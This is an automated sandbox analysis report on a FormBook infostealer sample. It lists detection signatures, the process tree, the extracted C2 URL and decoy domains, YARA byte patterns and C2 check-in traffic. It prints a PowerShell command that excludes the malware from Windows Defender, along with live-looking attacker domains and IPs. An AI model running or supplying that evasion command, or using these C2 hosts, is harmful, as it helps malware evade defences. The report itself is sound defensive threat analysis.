Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
docs.exe

Overview

General Information

Sample name:docs.exe
Analysis ID:1522819
MD5:136dcc6497b13fe87bbad4aa5f859593
SHA1:9da85420d2681d65df6757f44a0c8055ce6c1fba
SHA256:c89c37f0b5dc89251da6c37aa8e1071c43d52c80fd2326f1e6de8dcd5eaf0dfc
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • docs.exe (PID: 2672 cmdline: "C:\Users\user\Desktop\docs.exe" MD5: 136DCC6497B13FE87BBAD4AA5F859593)
    • powershell.exe (PID: 5172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3536 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • docs.exe (PID: 4620 cmdline: "C:\Users\user\Desktop\docs.exe" MD5: 136DCC6497B13FE87BBAD4AA5F859593)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • wscript.exe (PID: 2224 cmdline: "C:\Windows\SysWOW64\wscript.exe" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 5876 cmdline: /c del "C:\Users\user\Desktop\docs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ridges-freezers-56090.bond/c24t/"], "decoy": ["ealthbridgeccs.online", "ngelicais.art", "uktuksu1.sbs", "fapoker.asia", "hecreature.tech", "orenzoplaybest14.xyz", "op-smartphones-deal.today", "delark.click", "7395.asia", "otnews.cfd", "j16e.xyz", "oko.events", "fscxb.top", "roudtxliberals.vote", "asas-br.bond", "ourhealthyourlife.shop", "fbpd.top", "j9u9.xyz", "uijiuw.top", "aming-chair-37588.bond", "uaweiharmony.top", "458881233.men", "ewancash.boats", "mss-rb2.net", "472.top", "yhomeshop.online", "j88.travel", "02s-pest-control-us-ze.fun", "oinl.club", "ouseware.today", "1385.net", "eviewmadu.top", "khizmetlergirisyapzzz2024.net", "dcnn.net", "aketrtpmvpslot88.info", "hoys.club", "ealerslot.net", "consuyt.xyz", "ilw.legal", "aithful.events", "est-life-insurance-2507.today", "rvinsadeli.dev", "sx9u.shop", "23fd595ig.autos", "yrhbt.shop", "commerce-74302.bond", "lc-driving-school.net", "7y1ps.shop", "earing-tests-69481.bond", "amilablackwell.online", "venir-bienne.info", "024tengxun396.buzz", "ocoani.shop", "arage-door-repair-1.today", "entista-esp.today", "vto.stream", "loud-computing-intl-3455364.fyi", "9790.club", "us-inbox-messages.online", "aser-hair-removal-90284.bond", "etangkhap99.lol", "leaningjobs-cz.today", "nline-courses-classes-lv-1.bond", "essislotgoal14.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.docs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.docs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.docs.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          5.2.docs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.docs.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18819:$sqlite3step: 68 34 1C 7B E1
          • 0x1892c:$sqlite3step: 68 34 1C 7B E1
          • 0x18848:$sqlite3text: 68 38 2A 90 C5
          • 0x1896d:$sqlite3text: 68 38 2A 90 C5
          • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\docs.exe", ParentImage: C:\Users\user\Desktop\docs.exe, ParentProcessId: 2672, ParentProcessName: docs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe", ProcessId: 5172, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\docs.exe", ParentImage: C:\Users\user\Desktop\docs.exe, ParentProcessId: 2672, ParentProcessName: docs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe", ProcessId: 5172, ProcessName: powershell.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\docs.exe", ParentImage: C:\Users\user\Desktop\docs.exe, ParentProcessId: 2672, ParentProcessName: docs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe", ProcessId: 5172, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-30T18:17:01.206547+020020314531Malware Command and Control Activity Detected192.168.2.649727185.26.122.7080TCP
          2024-09-30T18:20:05.308366+020020314531Malware Command and Control Activity Detected192.168.2.649733188.114.96.380TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.ridges-freezers-56090.bond/c24t/"], "decoy": ["ealthbridgeccs.online", "ngelicais.art", "uktuksu1.sbs", "fapoker.asia", "hecreature.tech", "orenzoplaybest14.xyz", "op-smartphones-deal.today", "delark.click", "7395.asia", "otnews.cfd", "j16e.xyz", "oko.events", "fscxb.top", "roudtxliberals.vote", "asas-br.bond", "ourhealthyourlife.shop", "fbpd.top", "j9u9.xyz", "uijiuw.top", "aming-chair-37588.bond", "uaweiharmony.top", "458881233.men", "ewancash.boats", "mss-rb2.net", "472.top", "yhomeshop.online", "j88.travel", "02s-pest-control-us-ze.fun", "oinl.club", "ouseware.today", "1385.net", "eviewmadu.top", "khizmetlergirisyapzzz2024.net", "dcnn.net", "aketrtpmvpslot88.info", "hoys.club", "ealerslot.net", "consuyt.xyz", "ilw.legal", "aithful.events", "est-life-insurance-2507.today", "rvinsadeli.dev", "sx9u.shop", "23fd595ig.autos", "yrhbt.shop", "commerce-74302.bond", "lc-driving-school.net", "7y1ps.shop", "earing-tests-69481.bond", "amilablackwell.online", "venir-bienne.info", "024tengxun396.buzz", "ocoani.shop", "arage-door-repair-1.today", "entista-esp.today", "vto.stream", "loud-computing-intl-3455364.fyi", "9790.club", "us-inbox-messages.online", "aser-hair-removal-90284.bond", "etangkhap99.lol", "leaningjobs-cz.today", "nline-courses-classes-lv-1.bond", "essislotgoal14.xyz"]}
          Multi AV Scanner detection for submitted file
          Source: docs.exeReversingLabs: Detection: 44%
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: docs.exeJoe Sandbox ML: detected
          Source: docs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: docs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wscript.pdbGCTL source: docs.exe, 00000005.00000002.2213093676.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, docs.exe, 00000005.00000002.2213646142.0000000000EC0000.00000040.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: docs.exe, 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2212919973.000000000470C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2215494344.00000000048B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: docs.exe, docs.exe, 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, wscript.exe, 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2212919973.000000000470C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2215494344.00000000048B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wscript.pdb source: docs.exe, 00000005.00000002.2213093676.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, docs.exe, 00000005.00000002.2213646142.0000000000EC0000.00000040.10000000.00040000.00000000.sdmp, wscript.exe, wscript.exe, 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: fdGd.pdbSHA256 source: docs.exe
          Source: Binary string: fdGd.pdb source: docs.exe
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005923CE GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,8_2_005923CE

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49727 -> 185.26.122.70:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49727 -> 185.26.122.70:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49727 -> 185.26.122.70:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49733 -> 188.114.96.3:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49733 -> 188.114.96.3:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49733 -> 188.114.96.3:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 185.26.122.70 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.ridges-freezers-56090.bond/c24t/
          Source: global trafficHTTP traffic detected: GET /c24t/?I6=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbC02dv5lpT+B1+jbQ==&AL0=9rN46F HTTP/1.1Host: www.oko.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F HTTP/1.1Host: www.j88.travelConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: HOSTLANDRU HOSTLANDRU
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE94F82 getaddrinfo,setsockopt,recv,6_2_0FE94F82
          Source: global trafficHTTP traffic detected: GET /c24t/?I6=z+nAhoA8drw9p0SUk4F23aiKXvdwmiYumykkUl5XSRWt3Wct2pK+VZvxUbC02dv5lpT+B1+jbQ==&AL0=9rN46F HTTP/1.1Host: www.oko.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F HTTP/1.1Host: www.j88.travelConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.uijiuw.top
          Source: global trafficDNS traffic detected: DNS query: www.oko.events
          Source: global trafficDNS traffic detected: DNS query: www.hecreature.tech
          Source: global trafficDNS traffic detected: DNS query: www.ealerslot.net
          Source: global trafficDNS traffic detected: DNS query: www.aithful.events
          Source: global trafficDNS traffic detected: DNS query: www.amilablackwell.online
          Source: global trafficDNS traffic detected: DNS query: www.eviewmadu.top
          Source: global trafficDNS traffic detected: DNS query: www.khizmetlergirisyapzzz2024.net
          Source: global trafficDNS traffic detected: DNS query: www.23fd595ig.autos
          Source: global trafficDNS traffic detected: DNS query: www.j88.travel
          Source: global trafficDNS traffic detected: DNS query: www.venir-bienne.info
          Source: explorer.exe, 00000006.00000000.2157815827.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000006.00000002.4608809096.000000001079F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4586831233.000000000480C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.0000000004FEF000.00000004.10000000.00040000.00000000.sdmp, docs.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: explorer.exe, 00000006.00000002.4608809096.000000001079F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4586831233.000000000480C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.0000000004FEF000.00000004.10000000.00040000.00000000.sdmp, docs.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
          Source: explorer.exe, 00000006.00000000.2157815827.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000006.00000000.2157815827.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000006.00000002.4608809096.000000001079F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4586831233.000000000480C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.0000000004FEF000.00000004.10000000.00040000.00000000.sdmp, docs.exeString found in binary or memory: http://ocsp.comodoca.com0
          Source: explorer.exe, 00000006.00000000.2157815827.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000006.00000000.2155015039.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2155041109.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4588766205.00000000028A0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: docs.exe, 00000000.00000002.2160016383.0000000002FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.23fd595ig.autos
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.23fd595ig.autos/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.23fd595ig.autos/c24t/www.j88.travel
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.23fd595ig.autosReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.472.top
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.472.top/c24t/
